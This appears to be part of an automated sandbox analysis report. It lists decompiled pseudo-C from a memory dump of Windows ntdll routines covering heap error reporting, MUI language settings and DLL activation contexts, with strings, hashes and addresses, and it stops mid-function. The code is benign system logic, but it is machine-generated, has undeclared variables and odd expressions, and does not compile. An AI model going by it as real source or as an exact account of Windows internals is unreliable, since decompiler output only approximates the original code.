                                                              • This failed because of error %Ix., xrefs: 0109B446
                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0109B48F
                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0109B323
                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0109B47D
                                                              • write to, xrefs: 0109B4A6
                                                              • *** Inpage error in %ws:%s, xrefs: 0109B418
                                                              • a NULL pointer, xrefs: 0109B4E0
                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0109B38F
                                                              • The resource is owned exclusively by thread %p, xrefs: 0109B374
                                                              • The critical section is owned by thread %p., xrefs: 0109B3B9
                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0109B305
                                                              • The resource is owned shared by %d threads, xrefs: 0109B37E
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                              • API String ID: 0-108210295
                                                              • Opcode ID: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                                                              • Instruction ID: 456981eda588d109beb15d67dbb1126519e2c845e8440bd8a6eff6dae8def42e
                                                              • Opcode Fuzzy Hash: e4ae9e31c929a91e41132296ce40512f22bf8ab588279936a5b1937070ee35f8
                                                              • Instruction Fuzzy Hash: 40810375A40200FFDF21AB09AC95EAF3B76FF56B62F498085F5841B252D761C401FAB2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E010A1C06() {
                                                              				signed int _t27;
                                                              				char* _t104;
                                                              				char* _t105;
                                                              				intOrPtr _t113;
                                                              				intOrPtr _t115;
                                                              				intOrPtr _t117;
                                                              				intOrPtr _t119;
                                                              				intOrPtr _t120;
                                                              
                                                              				_t105 = 0xfc48a4;
                                                              				_t104 = "HEAP: ";
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E00FEB150();
                                                              				} else {
                                                              					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push( *0x10d589c);
                                                              				E00FEB150("Heap error detected at %p (heap handle %p)\n",  *0x10d58a0);
                                                              				_t27 =  *0x10d5898; // 0x0
                                                              				if(_t27 <= 0xf) {
                                                              					switch( *((intOrPtr*)(_t27 * 4 +  &M010A1E96))) {
                                                              						case 0:
                                                              							_t105 = "heap_failure_internal";
                                                              							goto L21;
                                                              						case 1:
                                                              							goto L21;
                                                              						case 2:
                                                              							goto L21;
                                                              						case 3:
                                                              							goto L21;
                                                              						case 4:
                                                              							goto L21;
                                                              						case 5:
                                                              							goto L21;
                                                              						case 6:
                                                              							goto L21;
                                                              						case 7:
                                                              							goto L21;
                                                              						case 8:
                                                              							goto L21;
                                                              						case 9:
                                                              							goto L21;
                                                              						case 0xa:
                                                              							goto L21;
                                                              						case 0xb:
                                                              							goto L21;
                                                              						case 0xc:
                                                              							goto L21;
                                                              						case 0xd:
                                                              							goto L21;
                                                              						case 0xe:
                                                              							goto L21;
                                                              						case 0xf:
                                                              							goto L21;
                                                              					}
                                                              				}
                                                              				L21:
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E00FEB150();
                                                              				} else {
                                                              					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				_push(_t105);
                                                              				E00FEB150("Error code: %d - %s\n",  *0x10d5898);
                                                              				_t113 =  *0x10d58a4; // 0x0
                                                              				if(_t113 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E00FEB150();
                                                              					} else {
                                                              						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E00FEB150("Parameter1: %p\n",  *0x10d58a4);
                                                              				}
                                                              				_t115 =  *0x10d58a8; // 0x0
                                                              				if(_t115 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E00FEB150();
                                                              					} else {
                                                              						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E00FEB150("Parameter2: %p\n",  *0x10d58a8);
                                                              				}
                                                              				_t117 =  *0x10d58ac; // 0x0
                                                              				if(_t117 != 0) {
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E00FEB150();
                                                              					} else {
                                                              						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					E00FEB150("Parameter3: %p\n",  *0x10d58ac);
                                                              				}
                                                              				_t119 =  *0x10d58b0; // 0x0
                                                              				if(_t119 != 0) {
                                                              					L41:
                                                              					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              						_push(_t104);
                                                              						E00FEB150();
                                                              					} else {
                                                              						E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              					}
                                                              					_push( *0x10d58b4);
                                                              					E00FEB150("Last known valid blocks: before - %p, after - %p\n",  *0x10d58b0);
                                                              				} else {
                                                              					_t120 =  *0x10d58b4; // 0x0
                                                              					if(_t120 != 0) {
                                                              						goto L41;
                                                              					}
                                                              				}
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
                                                              					_push(_t104);
                                                              					E00FEB150();
                                                              				} else {
                                                              					E00FEB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                              				}
                                                              				return E00FEB150("Stack trace available at %p\n", 0x10d58c0);
                                                              			}











                                                              0x010a1e00
                                                              0x010a1e0a
                                                              0x010a1e13
                                                              0x010a1e32
                                                              0x010a1e33
                                                              0x010a1e15
                                                              0x010a1e2a
                                                              0x010a1e2f
                                                              0x010a1e39
                                                              0x010a1e4a
                                                              0x010a1e02
                                                              0x010a1e02
                                                              0x010a1e08
                                                              0x00000000
                                                              0x00000000
                                                              0x010a1e08
                                                              0x010a1e5b
                                                              0x010a1e7a
                                                              0x010a1e7b
                                                              0x010a1e5d
                                                              0x010a1e72
                                                              0x010a1e77
                                                              0x010a1e95

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                              • API String ID: 0-2897834094
                                                              • Opcode ID: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                                                              • Instruction ID: 386d647f9bf340cc0f79b20e3492c45b47a87ffbd384c7b80e8ec8992e690b61
                                                              • Opcode Fuzzy Hash: 7f62e3a7677f3e2dff62f09ea9661ac2898729fa00aa556d9cb78ef55597d745
                                                              • Instruction Fuzzy Hash: 3661B03651A185DFD311BBC9E896E2573A5EB04B70F4D807FF949AF352C63C9840AB0A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E00FF3D34(signed int* __ecx) {
                                                              				signed int* _v8;
                                                              				char _v12;
                                                              				signed int* _v16;
                                                              				signed int* _v20;
                                                              				char _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				char _v36;
                                                              				signed int _v40;
                                                              				signed int _v44;
                                                              				signed int* _v48;
                                                              				signed int* _v52;
                                                              				signed int _v56;
                                                              				signed int _v60;
                                                              				char _v68;
                                                              				signed int _t140;
                                                              				signed int _t161;
                                                              				signed int* _t236;
                                                              				signed int* _t242;
                                                              				signed int* _t243;
                                                              				signed int* _t244;
                                                              				signed int* _t245;
                                                              				signed int _t255;
                                                              				void* _t257;
                                                              				signed int _t260;
                                                              				void* _t262;
                                                              				signed int _t264;
                                                              				void* _t267;
                                                              				signed int _t275;
                                                              				signed int* _t276;
                                                              				short* _t277;
                                                              				signed int* _t278;
                                                              				signed int* _t279;
                                                              				signed int* _t280;
                                                              				short* _t281;
                                                              				signed int* _t282;
                                                              				short* _t283;
                                                              				signed int* _t284;
                                                              				void* _t285;
                                                              
                                                              				_v60 = _v60 | 0xffffffff;
                                                              				_t280 = 0;
                                                              				_t242 = __ecx;
                                                              				_v52 = __ecx;
                                                              				_v8 = 0;
                                                              				_v20 = 0;
                                                              				_v40 = 0;
                                                              				_v28 = 0;
                                                              				_v32 = 0;
                                                              				_v44 = 0;
                                                              				_v56 = 0;
                                                              				_t275 = 0;
                                                              				_v16 = 0;
                                                              				if(__ecx == 0) {
                                                              					_t280 = 0xc000000d;
                                                              					_t140 = 0;
                                                              					L50:
                                                              					 *_t242 =  *_t242 | 0x00000800;
                                                              					_t242[0x13] = _t140;
                                                              					_t242[0x16] = _v40;
                                                              					_t242[0x18] = _v28;
                                                              					_t242[0x14] = _v32;
                                                              					_t242[0x17] = _t275;
                                                              					_t242[0x15] = _v44;
                                                              					_t242[0x11] = _v56;
                                                              					_t242[0x12] = _v60;
                                                              					return _t280;
                                                              				}
                                                              				if(E00FF1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v56 = 1;
                                                              					if(_v8 != 0) {
                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
                                                              					}
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E00FF1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
                                                              					_v60 =  *_v8;
                                                              					L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
                                                              					_v8 = _t280;
                                                              				}
                                                              				if(E00FF1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              					L16:
                                                              					if(E00FF1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
                                                              						L28:
                                                              						if(E00FF1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
                                                              							L46:
                                                              							_t275 = _v16;
                                                              							L47:
                                                              							_t161 = 0;
                                                              							L48:
                                                              							if(_v8 != 0) {
                                                              								L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
                                                              							}
                                                              							_t140 = _v20;
                                                              							if(_t140 != 0) {
                                                              								if(_t275 != 0) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
                                                              									_t275 = 0;
                                                              									_v28 = 0;
                                                              									_t140 = _v20;
                                                              								}
                                                              							}
                                                              							goto L50;
                                                              						}
                                                              						_t167 = _v12;
                                                              						_t255 = _v12 + 4;
                                                              						_v44 = _t255;
                                                              						if(_t255 == 0) {
                                                              							_t276 = _t280;
                                                              							_v32 = _t280;
                                                              						} else {
                                                              							_t276 = L01004620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
                                                              							_t167 = _v12;
                                                              							_v32 = _t276;
                                                              						}
                                                              						if(_t276 == 0) {
                                                              							_v44 = _t280;
                                                              							_t280 = 0xc0000017;
                                                              							goto L46;
                                                              						} else {
                                                              							E0102F3E0(_t276, _v8, _t167);
                                                              							_v48 = _t276;
                                                              							_t277 = E01031370(_t276, 0xfc4e90);
                                                              							_pop(_t257);
                                                              							if(_t277 == 0) {
                                                              								L38:
                                                              								_t170 = _v48;
                                                              								if( *_v48 != 0) {
                                                              									E0102BB40(0,  &_v68, _t170);
                                                              									if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              										_t280 =  &(_t280[0]);
                                                              									}
                                                              								}
                                                              								if(_t280 == 0) {
                                                              									_t280 = 0;
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
                                                              									_v44 = 0;
                                                              									_v32 = 0;
                                                              								} else {
                                                              									_t280 = 0;
                                                              								}
                                                              								_t174 = _v8;
                                                              								if(_v8 != 0) {
                                                              									L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
                                                              								}
                                                              								_v8 = _t280;
                                                              								goto L46;
                                                              							}
                                                              							_t243 = _v48;
                                                              							do {
                                                              								 *_t277 = 0;
                                                              								_t278 = _t277 + 2;
                                                              								E0102BB40(_t257,  &_v68, _t243);
                                                              								if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              									_t280 =  &(_t280[0]);
                                                              								}
                                                              								_t243 = _t278;
                                                              								_t277 = E01031370(_t278, 0xfc4e90);
                                                              								_pop(_t257);
                                                              							} while (_t277 != 0);
                                                              							_v48 = _t243;
                                                              							_t242 = _v52;
                                                              							goto L38;
                                                              						}
                                                              					}
                                                              					_t191 = _v12;
                                                              					_t260 = _v12 + 4;
                                                              					_v28 = _t260;
                                                              					if(_t260 == 0) {
                                                              						_t275 = _t280;
                                                              						_v16 = _t280;
                                                              					} else {
                                                              						_t275 = L01004620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
                                                              						_t191 = _v12;
                                                              						_v16 = _t275;
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						_v28 = _t280;
                                                              						_t280 = 0xc0000017;
                                                              						goto L47;
                                                              					} else {
                                                              						E0102F3E0(_t275, _v8, _t191);
                                                              						_t285 = _t285 + 0xc;
                                                              						_v48 = _t275;
                                                              						_t279 = _t280;
                                                              						_t281 = E01031370(_v16, 0xfc4e90);
                                                              						_pop(_t262);
                                                              						if(_t281 != 0) {
                                                              							_t244 = _v48;
                                                              							do {
                                                              								 *_t281 = 0;
                                                              								_t282 = _t281 + 2;
                                                              								E0102BB40(_t262,  &_v68, _t244);
                                                              								if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              									_t279 =  &(_t279[0]);
                                                              								}
                                                              								_t244 = _t282;
                                                              								_t281 = E01031370(_t282, 0xfc4e90);
                                                              								_pop(_t262);
                                                              							} while (_t281 != 0);
                                                              							_v48 = _t244;
                                                              							_t242 = _v52;
                                                              						}
                                                              						_t201 = _v48;
                                                              						_t280 = 0;
                                                              						if( *_v48 != 0) {
                                                              							E0102BB40(_t262,  &_v68, _t201);
                                                              							if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              								_t279 =  &(_t279[0]);
                                                              							}
                                                              						}
                                                              						if(_t279 == 0) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
                                                              							_v28 = _t280;
                                                              							_v16 = _t280;
                                                              						}
                                                              						_t202 = _v8;
                                                              						if(_v8 != 0) {
                                                              							L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
                                                              						}
                                                              						_v8 = _t280;
                                                              						goto L28;
                                                              					}
                                                              				}
                                                              				_t214 = _v12;
                                                              				_t264 = _v12 + 4;
                                                              				_v40 = _t264;
                                                              				if(_t264 == 0) {
                                                              					_v20 = _t280;
                                                              				} else {
                                                              					_t236 = L01004620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
                                                              					_t280 = _t236;
                                                              					_v20 = _t236;
                                                              					_t214 = _v12;
                                                              				}
                                                              				if(_t280 == 0) {
                                                              					_t161 = 0;
                                                              					_t280 = 0xc0000017;
                                                              					_v40 = 0;
                                                              					goto L48;
                                                              				} else {
                                                              					E0102F3E0(_t280, _v8, _t214);
                                                              					_t285 = _t285 + 0xc;
                                                              					_v48 = _t280;
                                                              					_t283 = E01031370(_t280, 0xfc4e90);
                                                              					_pop(_t267);
                                                              					if(_t283 != 0) {
                                                              						_t245 = _v48;
                                                              						do {
                                                              							 *_t283 = 0;
                                                              							_t284 = _t283 + 2;
                                                              							E0102BB40(_t267,  &_v68, _t245);
                                                              							if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              								_t275 = _t275 + 1;
                                                              							}
                                                              							_t245 = _t284;
                                                              							_t283 = E01031370(_t284, 0xfc4e90);
                                                              							_pop(_t267);
                                                              						} while (_t283 != 0);
                                                              						_v48 = _t245;
                                                              						_t242 = _v52;
                                                              					}
                                                              					_t224 = _v48;
                                                              					_t280 = 0;
                                                              					if( *_v48 != 0) {
                                                              						E0102BB40(_t267,  &_v68, _t224);
                                                              						if(L00FF43C0( &_v68,  &_v24) != 0) {
                                                              							_t275 = _t275 + 1;
                                                              						}
                                                              					}
                                                              					if(_t275 == 0) {
                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v20);
                                                              						_v40 = _t280;
                                                              						_v20 = _t280;
                                                              					}
                                                              					_t225 = _v8;
                                                              					if(_v8 != 0) {
                                                              						L010077F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t225);
                                                              					}
                                                              					_v8 = _t280;
                                                              					goto L16;
                                                              				}
                                                              			}


                                                              Strings
                                                              • WindowsExcludedProcs, xrefs: 00FF3D6F
                                                              • Kernel-MUI-Language-SKU, xrefs: 00FF3F70
                                                              • Kernel-MUI-Language-Disallowed, xrefs: 00FF3E97
                                                              • Kernel-MUI-Number-Allowed, xrefs: 00FF3D8C
                                                              • Kernel-MUI-Language-Allowed, xrefs: 00FF3DC0
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                                              • API String ID: 0-258546922
                                                              • Opcode ID: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                                                              • Instruction ID: 59592607ab2095f4872ee66d0649f6aece3986748f00292c47ce0f1b97d3c131
                                                              • Opcode Fuzzy Hash: 7bcd747d3b62aa2f75bac80be247be58ce68ed77ea71b60fdf01942f0d3bfb32
                                                              • Instruction Fuzzy Hash: 1BF15DB2D00219EBCB15DF98C980AEEBBF9FF48750F14406AE645E7261D734AE01DB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 44%
                                                              			E01018E00(void* __ecx) {
                                                              				signed int _v8;
                                                              				char _v12;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				intOrPtr* _t32;
                                                              				intOrPtr _t35;
                                                              				intOrPtr _t43;
                                                              				void* _t46;
                                                              				intOrPtr _t47;
                                                              				void* _t48;
                                                              				signed int _t49;
                                                              				void* _t50;
                                                              				intOrPtr* _t51;
                                                              				signed int _t52;
                                                              				void* _t53;
                                                              				intOrPtr _t55;
                                                              
                                                              				_v8 =  *0x10dd360 ^ _t52;
                                                              				_t49 = 0;
                                                              				_t48 = __ecx;
                                                              				_t55 =  *0x10d8464; // 0x74b10110
                                                              				if(_t55 == 0) {
                                                              					L9:
                                                              					if( !_t49 >= 0) {
                                                              						if(( *0x10d5780 & 0x00000003) != 0) {
                                                              							E01065510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
                                                              						}
                                                              						if(( *0x10d5780 & 0x00000010) != 0) {
                                                              							asm("int3");
                                                              						}
                                                              					}
                                                              					return E0102B640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
                                                              				}
                                                              				_t47 =  *((intOrPtr*)(__ecx + 0x18));
                                                              				_t43 =  *0x10d7984; // 0xb82c58
                                                              				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
                                                              					_t32 =  *((intOrPtr*)(_t48 + 0x28));
                                                              					if(_t48 == _t43) {
                                                              						_t50 = 0x5c;
                                                              						if( *_t32 == _t50) {
                                                              							_t46 = 0x3f;
                                                              							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
                                                              								_t32 = _t32 + 8;
                                                              							}
                                                              						}
                                                              					}
                                                              					_t51 =  *0x10d8464; // 0x74b10110
                                                              					 *0x10db1e0(_t47, _t32,  &_v12);
                                                              					_t49 =  *_t51();
                                                              					if(_t49 >= 0) {
                                                              						L8:
                                                              						_t35 = _v12;
                                                              						if(_t35 != 0) {
                                                              							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
                                                              								E01019B10( *((intOrPtr*)(_t48 + 0x48)));
                                                              								_t35 = _v12;
                                                              							}
                                                              							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
                                                              						}
                                                              						goto L9;
                                                              					}
                                                              					if(_t49 != 0xc000008a) {
                                                              						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
                                                              							if(_t49 != 0xc00000bb) {
                                                              								goto L8;
                                                              							}
                                                              						}
                                                              					}
                                                              					if(( *0x10d5780 & 0x00000005) != 0) {
                                                              						_push(_t49);
                                                              						E01065510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
                                                              						_t53 = _t53 + 0x1c;
                                                              					}
                                                              					_t49 = 0;
                                                              					goto L8;
                                                              				} else {
                                                              					goto L9;
                                                              				}
                                                              			}

                                                              Strings
                                                              • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0105932A
                                                              • Querying the active activation context failed with status 0x%08lx, xrefs: 01059357
                                                              • minkernel\ntdll\ldrsnap.c, xrefs: 0105933B, 01059367
                                                              • LdrpFindDllActivationContext, xrefs: 01059331, 0105935D
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.274786872.0000000000FC0000.00000040.00000001.sdmp, Offset: 00FC0000, based on PE: true
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                              • API String ID: 0-3779518884
                                                              • Opcode ID: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                                                              • Instruction ID: bf6e8b670d3dce02e4afe05e7e438cb3b972545ec2925168cc7fe27021d82bd1
                                                              • Opcode Fuzzy Hash: d9cae984b4cc0b0ae58afc7058eb0b37a0e7bbfb67b2ffb17974915386f929a3
                                                              • Instruction Fuzzy Hash: 46411931A003119EDBB5AA1C8849B7A76F4BB01348F05C1ABEDC497599E7789E8083C1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 83%
                                                              			E00FF8794(void* __ecx) {
                                                              				signed int _v0;
                                                              				char _v8;
                                                              				signed int _v12;
                                                              				void* _v16;
                                                              				signed int _v20;
                                                              				intOrPtr _v24;
                                                              				signed int _v28;
                                                              				signed int _v32;
                                                              				signed int _v40;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				void* __ebp;
                                                              				intOrPtr* _t77;
                                                              				signed int _t80;
                                                              				signed char _t81;
                                                              				signed int _t87;
                                                              				signed int _t91;
                                                              				void* _t92;
                                                              				void* _t94;
                                                              				signed int _t95;
                                                              				signed int _t103;
                                                              				signed int _t105;
                                                              				signed int _t110;
                                                              				signed int _t118;
                                                              				intOrPtr* _t121;
                                                              				intOrPtr _t122;
                                                              				signed int _t125;
                                                              				signed int _t129;
                                                              				signed int _t131;
                                                              				signed int _t134;
                                                              				signed int _t136;
                                                              				signed int _t143;
                                                              				signed int* _t147;
                                                              				signed int _t151;
                                                              				void* _t153;
                                                              				signed int* _t157;
                                                              				signed int _t159;
                                                              				signed int _t161;
                                                              				signed int _t166;
                                                              				signed int _t168;
                                                              
                                                              				_push(__ecx);
                                                              				_t153 = __ecx;
                                                              				_t159 = 0;
                                                              				_t121 = __ecx + 0x3c;
                                                              				if( *_t121 == 0) {
                                                              					L2:
                                                              					_t77 =  *((intOrPtr*)(_t153 + 0x58));
                                                              					if(_t77 == 0 ||  *_t77 ==  *((intOrPtr*)(_t153 + 0x54))) {
                                                              						_t122 =  *((intOrPtr*)(_t153 + 0x20));
                                                              						_t180 =  *((intOrPtr*)(_t122 + 0x3a));
                                                              						if( *((intOrPtr*)(_t122 + 0x3a)) != 0) {
                                                              							L6:
                                                              							if(E00FF934A() != 0) {
                                                              								_t159 = E0106A9D2( *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)), 0, 0);
                                                              								__eflags = _t159;
                                                              								if(_t159 < 0) {
                                                              									_t81 =  *0x10d5780; // 0x0
                                                              									__eflags = _t81 & 0x00000003;
                                                              									if((_t81 & 0x00000003) != 0) {
                                                              										_push(_t159);
                                                              										E01065510("minkernel\\ntdll\\ldrsnap.c", 0x235, "LdrpDoPostSnapWork", 0, "LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x\n",  *((intOrPtr*)( *((intOrPtr*)(_t153 + 0x20)) + 0x18)));
                                                              										_t81 =  *0x10d5780; // 0x0
                                                              									}
                                                              									__eflags = _t81 & 0x00000010;
                                                              									if((_t81 & 0x00000010) != 0) {
                                                              										asm("int3");
                                                              									}
                                                              								}
                                                              							}
                                                              						} else {
                                                              							_t159 = E00FF849B(0, _t122, _t153, _t159, _t180);
                                                              							if(_t159 >= 0) {
                                                              								goto L6;
                                                              							}
                                                              						}
                                                              						_t80 = _t159;
                                                              						goto L8;
                                                              					} else {
                                                              						_t125 = 0x13;
                                                              						asm("int 0x29");
                                                              						_push(0);
                                                              						_push(_t159);
                                                              						_t161 = _t125;
                                                              						_t87 =  *( *[fs:0x30] + 0x1e8);
                                                              						_t143 = 0;
                                                              						_v40 = _t161;
                                                              						_t118 = 0;
                                                              						_push(_t153);
                                                              						__eflags = _t87;
                                                              						if(_t87 != 0) {
                                                              							_t118 = _t87 + 0x5d8;
                                                              							__eflags = _t118;
                                                              							if(_t118 == 0) {
                                                              								L46:
                                                              								_t118 = 0;
                                                              							} else {
                                                              								__eflags =  *(_t118 + 0x30);
                                                              								if( *(_t118 + 0x30) == 0) {
                                                              									goto L46;
                                                              								}
                                                              							}
                                                              						}
                                                              						_v32 = 0;
                                                              						_v28 = 0;
                                                              						_v16 = 0;
                                                              						_v20 = 0;
                                                              						_v12 = 0;
                                                              						__eflags = _t118;
                                                              						if(_t118 != 0) {
                                                              							__eflags = _t161;
                                                              							if(_t161 != 0) {
                                                              								__eflags =  *(_t118 + 8);
                                                              								if( *(_t118 + 8) == 0) {
                                                              									L22:
                                                              									_t143 = 1;
                                                              									__eflags = 1;
                                                              								} else {
                                                              									_t19 = _t118 + 0x40; // 0x40
                                                              									_t156 = _t19;
                                                              									E00FF8999(_t19,  &_v16);
                                                              									__eflags = _v0;
                                                              									if(_v0 != 0) {
                                                              										__eflags = _v0 - 1;
                                                              										if(_v0 != 1) {
                                                              											goto L22;
                                                              										} else {
                                                              											_t128 =  *(_t161 + 0x64);
                                                              											__eflags =  *(_t161 + 0x64);
                                                              											if( *(_t161 + 0x64) == 0) {
                                                              												goto L22;
                                                              											} else {
